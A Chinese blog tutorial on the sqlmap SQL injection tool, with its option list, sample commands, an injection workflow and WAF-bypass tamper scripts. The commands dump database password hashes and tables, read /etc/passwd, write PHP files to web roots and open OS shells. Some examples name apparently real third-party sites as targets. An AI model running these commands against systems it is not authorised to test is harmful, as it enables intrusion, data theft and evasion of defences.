渗透测试工具篇——sqlmap

2024-04-16 17:32
文章标签 渗透 sqlmap 测试工具

本文主要是介绍渗透测试工具篇——sqlmap,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录
  • 简介
  • 基本使用
    • 全部参数说明
    • 简单使用
    • 注入流程
  • sqlmap使用技巧
    • 修改最大线程数
    • sqlmap速度优化
    • 指定位置注入
    • 检测waf
    • 执行操作系统命令(--os-shell/--os-cmd)
    • 操作文件
  • 绕WAF的技巧
    • 使用参数绕过
    • 使用tamper绕过
      • tamper种类
      • mysql绕过
      • MSSQL绕过
      • access绕过
      • Oracle绕过
  • 参考文档

简介

sqlmap 是一款自动化检测与利用 SQL 注入漏洞的免费开源工具。

目前可以检测用来于检测利用五种不同类型的 SQL 注入

  • 布尔型盲注(Boolean-based blind):sqlmap 会替换或添加 SQL 语句到 HTTP 请求的查询参数里面,相关的 SQL 语句可能是合法的 SELECT 子查询,也可以是任意用于获取输出数据的 SQL 语句。针对每个注入检测的 HTTP 响应,sqlmap 通过对比原始请求响应的 headers/body,从而逐个字符地推导出注入语句的输出。或者,用户可以预先提供一个字符串或正则表达式,用于对正确页面结果进行匹配。sqlmap 内部实现了二分算法,使得输出中的每一个字符可在最多 7 个 HTTP 请求内被获取。如果请求响应结果不是简单的明文字符集,sqlmap 会采取更大范围的算法来检测输出。

  • 时间型盲注(Time-based blind):sqlmap 会替换或者添加相关的 SQL 语句到 HTTP 请求的查询参数里面,相关的 SQL 语句可能是合法的、用于使后端 DBMS(Database Management System,数据库管理系统)延迟几秒响应的查询。针对每一个注入检测的 HTTP 响应,通过对 HTTP 响应时间与原始请求之间进行比较,从而逐个字符地推导出注入语句的输出。正如基于布尔型盲注的技术一样,二分算法也会被应用。

  • 报错型注入(Error-based):sqlmap 会替换或者添加用于引发特定数据库错误的 SQL 语句到查询参数里面,并通过解析对应的注入结果,判断特定的数据库错误信息是否存在响应的 headers/body 中。这项技术只有在 Web 应用配置开启后端 DBMS 错误信息提醒才有效。

  • 联合查询注入(UNION query-based):sqlmap 会在查询参数中添加以 UNION ALL SELECT 开头的合法 SQL 语句。当 Web 应用在 for 循环中直接传递 SELECT 语句的查询结果,或采用了类似的方法将查询结果在页面中逐行输出时,这项技术会生效。当查询结果不使用 for 循环进行全部输出而只输出首个结果,sqlmap 还能够利用偏(单入口)联合查询 SQL 注入漏洞。

  • 堆叠查询注入(Stacked queries),也被称为捎带查询注入(piggy backing):sqlmap 会测试 Web 应用是否支持堆叠查询,如果支持,则在 HTTP 请求的查询参数中添加一个分号(;),并在后面加上注入的 SQL 语句。这项技术不仅适用于执行 SELECT 语句,同样适用于执行数据定义或者数据操作等 SQL 语句,同时可能可以获取到文件系统的读写权限和系统命令执行权限,不过这很大程度上取决于底层 DBMS 和当前会话用户的权限。

sqlmap目前完全支持 MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB, Informix,MariaDB,Percona,MemSQL,TiDB,CockroachDB,HSQLDB,H2,MonetDB,Apache Derby,Vertica,Mckoi,Presto 和 Altibase 等 DBMS(Database Management System,数据库管理系统)。

基本使用

全部参数说明

选项:-h, --help            显示基本帮助信息并退出-hh                   显示高级帮助信息并退出--version             显示程序版本信息并退出-v VERBOSE            输出信息详细程度级别:0-6(默认为 1)#目标:至少提供一个以下选项以指定目标-d DIRECT           直接连接数据库-u URL, --url=URL   目标 URL(例如:"http://www.site.com/vuln.php?id=1")-l LOGFILE          从 Burp 或 WebScarab 代理的日志文件中解析目标地址-m BULKFILE         从文本文件中获取批量目标-r REQUESTFILE      从文件中读取 HTTP 请求-g GOOGLEDORK       使用 Google dork 结果作为目标-c CONFIGFILE       从 INI 配置文件中加载选项#请求:以下选项可以指定连接目标地址的方式--method=METHOD     强制使用提供的 HTTP 方法(例如:PUT)--data=DATA         使用 POST 发送数据串(例如:"id=1")--param-del=PARA..  设置参数值分隔符(例如:&)--cookie=COOKIE     指定 HTTP Cookie(例如:"PHPSESSID=a8d127e..")--cookie-del=COO..  设置 cookie 分隔符(例如:;)--load-cookies=L..  指定以 Netscape/wget 格式存放 cookies 的文件--drop-set-cookie   忽略 HTTP 响应中的 Set-Cookie 参数--user-agent=AGENT  指定 HTTP User-Agent--random-agent      使用随机的 HTTP User-Agent--host=HOST         指定 HTTP Host--referer=REFERER   指定 HTTP Referer-H HEADER, --hea..  设置额外的 HTTP 头参数(例如:"X-Forwarded-For: 127.0.0.1")--headers=HEADERS   设置额外的 HTTP 头参数(例如:"Accept-Language: fr\nETag: 123")--auth-type=AUTH..  HTTP 认证方式(Basic,Digest,NTLM 或 PKI)--auth-cred=AUTH..  HTTP 认证凭证(username:password)--auth-file=AUTH..  HTTP 认证 PEM 证书/私钥文件--ignore-code=IG..  忽略(有问题的)HTTP 错误码(例如:401)--ignore-proxy      忽略系统默认代理设置--ignore-redirects  忽略重定向尝试--ignore-timeouts   忽略连接超时--proxy=PROXY       使用代理连接目标 URL--proxy-cred=PRO..  使用代理进行认证(username:password)--proxy-file=PRO..  从文件中加载代理列表--tor               使用 Tor 匿名网络--tor-port=TORPORT  设置 Tor 代理端口代替默认端口--tor-type=TORTYPE  设置 Tor 代理方式(HTTP,SOCKS4 或 SOCKS5(默认))--check-tor         检查是否正确使用了 Tor--delay=DELAY       设置每个 HTTP 请求的延迟秒数--timeout=TIMEOUT   设置连接响应的有效秒数(默认为 30)--retries=RETRIES   连接超时时重试次数(默认为 3)--randomize=RPARAM  随机更改给定的参数值--safe-url=SAFEURL  测试过程中可频繁访问且合法的 URL 地址(译者注:有些网站在你连续多次访问错误地址时会关闭会话连接,后面的“请求”小节有详细说明)--safe-post=SAFE..  使用 POST 方法发送合法的数据--safe-req=SAFER..  从文件中加载合法的 HTTP 请求--safe-freq=SAFE..  每访问两次给定的合法 URL 才发送一次测试请求--skip-urlencode    不对 payload 数据进行 URL 编码--csrf-token=CSR..  设置网站用来反 CSRF 攻击的 token--csrf-url=CSRFURL  指定可提取防 CSRF 攻击 token 的 URL--force-ssl         强制使用 SSL/HTTPS--hpp               使用 HTTP 参数污染攻击--eval=EVALCODE     在发起请求前执行给定的 Python 代码(例如:"import hashlib;id2=hashlib.md5(id).hexdigest()")#优化:以下选项用于优化 sqlmap 性能-o                  开启所有优化开关--predict-output    预测常用请求的输出--keep-alive        使用持久的 HTTP(S) 连接--null-connection   仅获取页面大小而非实际的 HTTP 响应--threads=THREADS   设置 HTTP(S) 请求并发数最大值(默认为 1)注入:以下选项用于指定要测试的参数,提供自定义注入 payloads 和篡改参数的脚本-p TESTPARAMETER    指定需要测试的参数--skip=SKIP         指定要跳过的参数--skip-static       指定跳过非动态参数--param-exclude=..  用正则表达式排除参数(例如:"ses")--dbms=DBMS         指定后端 DBMS(Database Management System,数据库管理系统)类型(例如:MySQL)--dbms-cred=DBMS..  DBMS 认证凭据(username:password)--os=OS             指定后端 DBMS 的操作系统类型--invalid-bignum    将无效值设置为大数--invalid-logical   对无效值使用逻辑运算--invalid-string    对无效值使用随机字符串--no-cast           关闭 payload 构造机制--no-escape         关闭字符串转义机制--prefix=PREFIX     注入 payload 的前缀字符串--suffix=SUFFIX     注入 payload 的后缀字符串--tamper=TAMPER     用给定脚本修改注入数据检测:以下选项用于自定义检测方式--level=LEVEL       设置测试等级(1-5,默认为 1)--risk=RISK         设置测试风险等级(1-3,默认为 1)--string=STRING     用于确定查询结果为真时的字符串--not-string=NOT..  用于确定查询结果为假时的字符串--regexp=REGEXP     用于确定查询结果为真时的正则表达式--code=CODE         用于确定查询结果为真时的 HTTP 状态码--text-only         只根据页面文本内容对比页面--titles            只根据页面标题对比页面技术:以下选项用于调整特定 SQL 注入技术的测试方法--technique=TECH    使用的 SQL 注入技术(默认为“BEUSTQ”,译者注:B: Boolean-based blind SQL injection(布尔型盲注)E: Error-based SQL injection(报错型注入)U: UNION query SQL injection(联合查询注入)S: Stacked queries SQL injection(堆叠查询注入)T: Time-based blind SQL injection(时间型盲注)Q: inline Query injection(内联查询注入)--time-sec=TIMESEC  延迟 DBMS 的响应秒数(默认为 5)--union-cols=UCOLS  设置联合查询注入测试的列数目范围--union-char=UCHAR  用于暴力猜解列数的字符--union-from=UFROM  设置联合查询注入 FROM 处用到的表--dns-domain=DNS..  设置用于 DNS 渗出攻击的域名(译者注:推荐阅读《在SQL注入中使用DNS获取数据》http://cb.drops.wiki/drops/tips-5283.html,在后面的“技术”小节中也有相应解释)--second-url=SEC..  设置二阶响应的结果显示页面的 URL(译者注:该选项用于 SQL 二阶注入)--second-req=SEC..  从文件读取 HTTP 二阶请求指纹识别:-f, --fingerprint   执行广泛的 DBMS 版本指纹识别枚举:以下选项用于获取后端 DBMS 的信息,结构和数据表中的数据。此外,还可以运行你输入的 SQL 语句-a, --all           获取所有信息、数据-b, --banner        获取 DBMS banner--current-user      获取 DBMS 当前用户--current-db        获取 DBMS 当前数据库--hostname          获取 DBMS 服务器的主机名--is-dba            探测 DBMS 当前用户是否为 DBA(数据库管理员)--users             枚举出 DBMS 所有用户--passwords         枚举出 DBMS 所有用户的密码哈希--privileges        枚举出 DBMS 所有用户特权级--roles             枚举出 DBMS 所有用户角色--dbs               枚举出 DBMS 所有数据库--tables            枚举出 DBMS 数据库中的所有表--columns           枚举出 DBMS 表中的所有列--schema            枚举出 DBMS 所有模式--count             获取数据表数目--dump              导出 DBMS 数据库表项--dump-all          导出所有 DBMS 数据库表项--search            搜索列,表和/或数据库名--comments          枚举数据时检查 DBMS 注释-D DB               指定要枚举的 DBMS 数据库-T TBL              指定要枚举的 DBMS 数据表-C COL              指定要枚举的 DBMS 数据列-X EXCLUDE          指定不枚举的 DBMS 标识符-U USER             指定枚举的 DBMS 用户--exclude-sysdbs    枚举所有数据表时,指定排除特定系统数据库--pivot-column=P..  指定主列--where=DUMPWHERE   在转储表时使用 WHERE 条件语句--start=LIMITSTART  指定要导出的数据表条目开始行数--stop=LIMITSTOP    指定要导出的数据表条目结束行数--first=FIRSTCHAR   指定获取返回查询结果的开始字符位--last=LASTCHAR     指定获取返回查询结果的结束字符位--sql-query=QUERY   指定要执行的 SQL 语句--sql-shell         调出交互式 SQL shell--sql-file=SQLFILE  执行文件中的 SQL 语句暴力破解:以下选项用于暴力破解测试--common-tables     检测常见的表名是否存在--common-columns    检测常用的列名是否存在用户自定义函数注入:以下选项用于创建用户自定义函数--udf-inject        注入用户自定义函数--shared-lib=SHLIB  共享库的本地路径访问文件系统:以下选项用于访问后端 DBMS 的底层文件系统--file-read=FILE..  读取后端 DBMS 文件系统中的文件--file-write=FIL..  写入到后端 DBMS 文件系统中的文件--file-dest=FILE..  使用绝对路径写入到后端 DBMS 中的文件访问操作系统:以下选项用于访问后端 DBMS 的底层操作系统--os-cmd=OSCMD      执行操作系统命令--os-shell          调出交互式操作系统 shell--os-pwn            调出 OOB shell,Meterpreter 或 VNC--os-smbrelay       一键调出 OOB shell,Meterpreter 或 VNC--os-bof            利用存储过程的缓冲区溢出--priv-esc          数据库进程用户提权--msf-path=MSFPATH  Metasploit 框架的本地安装路径--tmp-path=TMPPATH  远程临时文件目录的绝对路径访问 Windows 注册表:以下选项用于访问后端 DBMS 的 Windows 注册表--reg-read          读取一个 Windows 注册表键值--reg-add           写入一个 Windows 注册表键值数据--reg-del           删除一个 Windows 注册表键值--reg-key=REGKEY    指定 Windows 注册表键--reg-value=REGVAL  指定 Windows 注册表键值--reg-data=REGDATA  指定 Windows 注册表键值数据--reg-type=REGTYPE  指定 Windows 注册表键值类型通用选项:以下选项用于设置通用的参数-s SESSIONFILE      从文件(.sqlite)中读入会话信息-t TRAFFICFILE      保存所有 HTTP 流量记录到指定文本文件--batch             从不询问用户输入,使用默认配置--binary-fields=..  具有二进制值的结果字段(例如:"digest")--check-internet    在访问目标之前检查是否正常连接互联网--crawl=CRAWLDEPTH  从目标 URL 开始爬取网站--crawl-exclude=..  用正则表达式筛选爬取的页面(例如:"logout")--csv-del=CSVDEL    指定输出到 CVS 文件时使用的分隔符(默认为“,”)--charset=CHARSET   指定 SQL 盲注字符集(例如:"0123456789abcdef")--dump-format=DU..  导出数据的格式(CSV(默认),HTML 或 SQLITE)--encoding=ENCOD..  指定获取数据时使用的字符编码(例如:GBK)--eta               显示每个结果输出的预计到达时间--flush-session     清空当前目标的会话文件--forms             解析并测试目标 URL 的表单--fresh-queries     忽略存储在会话文件中的查询结果--har=HARFILE       将所有 HTTP 流量记录到一个 HAR 文件中--hex               获取数据时使用 hex 转换--output-dir=OUT..  自定义输出目录路径--parse-errors      从响应中解析并显示 DBMS 错误信息--preprocess=PRE..  使用给定脚本预处理响应数据--repair            重新导出具有未知字符的数据(?)--save=SAVECONFIG   将选项设置保存到一个 INI 配置文件--scope=SCOPE       用正则表达式从提供的代理日志中过滤目标--test-filter=TE..  根据 payloads 和/或标题(例如:ROW)选择测试--test-skip=TEST..  根据 payloads 和/或标题(例如:BENCHMARK)跳过部分测试--update            更新 sqlmap杂项:-z MNEMONICS        使用短助记符(例如:“flu,bat,ban,tec=EU”)--alert=ALERT       在找到 SQL 注入时运行 OS 命令--answers=ANSWERS   设置预定义回答(例如:“quit=N,follow=N”)--beep              出现问题提醒或在发现 SQL 注入时发出提示音--cleanup           指定移除 DBMS 中的特定的 UDF 或者数据表--dependencies      检查 sqlmap 缺少(可选)的依赖--disable-coloring  关闭彩色控制台输出--gpage=GOOGLEPAGE  指定页码使用 Google dork 结果--identify-waf      针对 WAF/IPS 防护进行彻底的测试--mobile            使用 HTTP User-Agent 模仿智能手机--offline           在离线模式下工作(仅使用会话数据)--purge             安全删除 sqlmap data 目录所有内容--skip-waf          跳过启发式检测 WAF/IPS 防护--smart             只有在使用启发式检测时才进行彻底的测试--sqlmap-shell      调出交互式 sqlmap shell--tmp-dir=TMPDIR    指定用于存储临时文件的本地目录--web-root=WEBROOT  指定 Web 服务器根目录(例如:"/var/www")--wizard            适合初级用户的向导界面

简单使用

sqlmap -r http.txt  #http.txt是我们抓取的http的请求包
sqlmap -r http.txt -p username  #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sqlmap -u "http://www.xx.com/username/admin*"       #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"   #探测该url是否存在漏洞
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"   --cookie="抓取的cookie"   #当该网站需要登录时,探测该url是否存在漏洞
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"  --data="uname=admin&passwd=admin&submit=Submit"  #抓取其post提交的数据填入
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users      #查看数据库的所有用户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords  #查看数据库用户名的密码
有时候使用 --passwords 不能获取到密码,则可以试下
-D mysql -T user -C host,user,password --dump  当MySQL< 5.7时
-D mysql -T user -C host,user,authentication_string --dump  当MySQL>= 5.7时
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user  #查看数据库当前的用户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba    #判断当前用户是否有管理员权限
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles     #列出数据库所有管理员角色,仅适用于oracle数据库的时候sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"    --dbs        #爆出所有的数据库
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"    --tables     #爆出所有的数据表
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"    --columns    #爆出数据库中所有的列
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"    --current-db #查看当前的数据库
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #爆出数据库security中的所有的表
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns #爆出security数据库中users表中的所有的列
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump  #爆出数据库security中的users表中的username列中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump --start 1 --stop 100  #爆出数据库security中的users表中的username列中的前100条数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all   #爆出数据库security中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all  #爆出该数据库中的所有数据sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1"  --tamper=space2comment.py  #指定脚本进行过滤,用/**/代替空格
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 #探测等级5,平台危险等级3,都是最高级别。当level=2时,会测试cookie注入。当level=3时,会测试user-agent/referer注入。
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell  #执行指定的sql语句
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell/--os-cmd   #执行--os-shell命令,获取目标服务器权限
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-pwn   #执行--os-pwn命令,将目标权限弹到MSF上sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-read "c:/test.txt" #读取目标服务器C盘下的test.txt文件
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-write  test.txt  --file-dest "e:/hack.txt"  #将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txtsqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --dbms="MySQL"     #指定其数据库为mysql 
其他数据库:Altibase,Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft Access, Microsoft SQL Server, MimerSQL, MonetDB, MySQL, Oracle, PostgreSQL, Presto, SAP MaxDB, SQLite, Sybase, Vertica, eXtremeDB
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --random-agent   #使用任意的User-Agent爆破
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --proxy="http://127.0.0.1:8080"    #指定代理
当爆破HTTPS网站会出现超时的话,可以使用参数 --delay=3 --force-ssl
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --technique T    #指定时间延迟注入,这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式,当然,我们也可以直接手工指定。
支持的探测方式如下:B: Boolean-based blind SQL injection(布尔型注入)E: Error-based SQL injection(报错型注入)U: UNION query SQL injection(可联合查询注入)S: Stacked queries SQL injection(可多语句查询注入)T: Time-based blind SQL injection(基于时间延迟注入)sqlmap -d "mysql://root:root@192.168.10.130:3306/mysql" --os-shell   #知道网站的账号密码直接连接-v 3                   #输出详细度  最大值5 会显示请求包和回复包
--threads 5           #指定线程数
--fresh-queries       #清除缓存
--flush-session       #清空会话,重构注入 
--batch               #对所有的交互式的都是默认的
--random-agent        #任意的http头
--tamper base64encode            #对提交的数据进行base64编码
--referer http://www.baidu.com   #伪造referer字段--keep-alive     保持连接,当出现 [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s) 保错的时候,使用这个参数

注入流程

1.读取数据库版本,当前用户,当前数据库 sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1 2.判断当前数据库用户权限 sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用户名 -v 1 sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用户名 -v 1 3.读取所有数据库用户或指定数据库用户的密码 sqlmap -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2 sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2 4.获取所有数据库 sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2 5.获取指定数据库中的所有表 sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2 6.获取指定数据库名中指定表的字段 sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2 7.获取指定数据库名中指定表中指定字段的数据 sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2 8.file-read读取web文件 sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2 9.file-write写入文件到web sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2

sqlmap使用技巧

修改最大线程数

在sqlmap的安装目录中找到\lib\core\settings.py

# Maximum number of threads (avoiding connection issues and/or DoS)
MAX_NUMBER_OF_THREADS = 10
#修改为MAX_NUMBER_OF_THREADS = 1000

sqlmap速度优化

  • --keep-alive

    sqlmap 中可以设置连接为持久连接,也就是长连接,连接一次就不需要多次发送连接请求。HTTP 报文中设置connection:keep-alive

    注意: --keep-alive 不能与 --proxy 一起使用,会发送冲突

  • --null-connection

    sqlmap 中设置空连接,表示不接受 HTTP 当中的 Body,使用参数 --null-connection。 可以直接获得 HTTP 响应的大小而不用获得 HTTP 响应体,可以节省网络宽带的消耗,常用在盲注过程中

  • --threads

    sqlmap 中设置同时发送多少个 HTTP 请求的多线程( 默认最大线程不超过10,根据上面的方法修改之后可以超过10 )。参数 --thread=线程数

  • -o

    开启上面三个选项,线程设置为3

指定位置注入

默认情况下 Sqlmap 会测试所有 GET 参数和 POST 参数,当 level >= 2 时会测试 cookie 参数, 当 level >= 3 时会测试 User-AgentReferer

  • python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -p "id,user-agent" --banner
    #-p 可以手动指定一个以逗号分隔的、 要测试的参数列表
  • python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --level 5 -skip="user-agent,referer" --banner
    #不想测试某一参数则可以使用 --skip
  • python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1*&uname=admin*"  --banner
    #当注入点位于URI本身内部时,必须在命令行中添加星号 * 来指定这些注入点,可以用来注入伪静态页面

检测waf

sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10  --check-waf#备选#使用参数进行绕过
--random-agent    使用任意HTTP头进行绕过,尤其是在WAF配置不当的时候
--time-sec=3      使用长的延时来避免触发WAF的机制,这方式比较耗时
--hpp             使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
--proxy=100.100.100.100:8080 --proxy-cred=211:985      使用代理进行绕过
--ignore-proxy    禁止使用系统的代理,直接连接进行注入
--flush-session   清空会话,重构注入
--hex 或者 --no-cast     进行字符码转换
--mobile          对移动端的服务器进行注入
--tor             匿名注入
--tamper          使用合适的脚本进行绕过(/usr/share/sqlmap/tamper)

执行操作系统命令(--os-shell/--os-cmd)

当后端 DBMS(Database Management System,数据库管理系统)为 MySQL,PostgreSQL 或 Microsoft SQL Server,并且当前会话用户拥有对数据库特定功能和相关架构特性的利用权限时,sqlmap 能够在数据库所在服务器的操作系统上运行任意的命令

在 MySQL 和 PostgreSQL 中,sqlmap 可以上传(通过前面描述的文件上传功能)一个包含两个用户自定义函数——分别为 sys_exec()sys_eval() 的共享库(二进制文件),然后在数据库中创建出两个对应函数,并调用对应函数执行特定的命令,并允许用户选择是否打印出相关命令执行的结果。在 Microsoft SQL Server 中,sqlmap 会利用 xp_cmdshell 存储过程:如果该存储过程被关闭了(Microsoft SQL Server 的 2005 及以上版本默认关闭),sqlmap 则会将其重新打开;如果该存储过程不存在,sqlmap 则会重新创建它。

执行命令需要的条件:

(1)网站必须是root权限

(2)攻击者需要知道网站的绝对路径

(3)GPC为off,php主动转义的功能关闭

(4)secure_file_priv为空

操作文件

当后端 DBMS(Database Management System,数据库管理系统)为 MySQL,PostgreSQL 或者 Microsoft SQL Server,并且当前会话用户拥有利用数据库特定功能和相关架构弱点的权限时,sqlmap 能够直接读取底层文件系统中文件的内容。文件可以是文本文件或者二进制文件,sqlmap 都能够正确地处理相关文件。

  • --file-read

    sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-read "c:/test.txt" #读取目标服务器C盘下的test.txt文件
  • --file-write--file-dest

    python2 sqlmap.py -u http://192.168.10.130/sqli-labs/Less-2/?id=1 --file-write C:\Users\mi\Desktop\1.php --file-dest "C:\phpStudy\PHPTutorial\WWW\2.php"  #将本地的C:\Users\mi\Desktop\1.php文件上传到目标服务器C:\phpStudy\PHPTutorial\WWW\2.php

绕WAF的技巧

使用参数绕过

sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985   #使用代理进行注入sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy  #禁止使用系统的代理,直接连接进行注入sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session  #清空会话,重构注入sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex   #或者使用参数 --no-cast ,进行字符码转换sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --mobile #对移动端的服务器进行注入sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入

使用tamper绕过

使用格式:

  • sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py   #脚本A,脚本B
  • sqlmap -u http://www.shsuna.com/en/company.php?id=37 -v 3 --dbs --batch --tamper "space2morehash.py"

tamper种类

01 apostrophemask.py#用utf8代替引号;Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'02 equaltolike.py#MSSQL * SQLite中like 代替等号;Example:  Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 103 greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'04 space2hash.py#空格替换为#号 随机字符串 以及换行符;Input: 1 AND 9227=9227;Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=922705 apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;06 halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论;07 space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;08 appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码;Example: ('1 AND 1=1') '1 AND 1=1%00'09 ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’10 space2mssqlblank.py(mssql)#mssql空格替换为其它空符号11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all12 space2mssqlhash.py#mssql查询中替换空格13 modsecurityversioned.py#(mysql中过滤空格,包含完整的查询版本注释;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'14 space2mysqlblank.py#(mysql中空格替换其它空白符号15 between.py#MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替换大于号(>)16 space2mysqldash.py#MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)17 multiplespaces.py#围绕SQL关键字添加多个空格;Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'18 space2plus.py#用+替换空格;Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'19 bluecoat.py#MySQL 5.1, SGOS代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like20 nonrecursivereplacement.py#双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters21 space2randomblank.py#代替空格字符(“”)从一个随机的空白字符可选字符的有效集22 sp_password.py#追加sp_password’从DBMS日志的自动模糊处理的26 有效载荷的末尾23 chardoubleencode.py#双url编码(不处理以编码的)24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'25 charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;26 randomcase.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写27 unmagicquotes.py#宽字符绕过 GPC addslashes;Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%2028 randomcomments.py#用/**/分割sql关键字;Example:‘INSERT’ becomes ‘IN//S//ERT’29 charunicodeencode.py#ASP,ASP.NET中字符串 unicode 编码;30 securesphere.py#追加特制的字符串;Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"31 versionedmorekeywords.py#MySQL >= 5.1.13注释绕过32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’33 halfversionedmorekeywords.py#MySQL < 5.1中关键字前加注释
34 space2plus.py  #将空格替换为+号,用来绕过WTS类型的 WAF

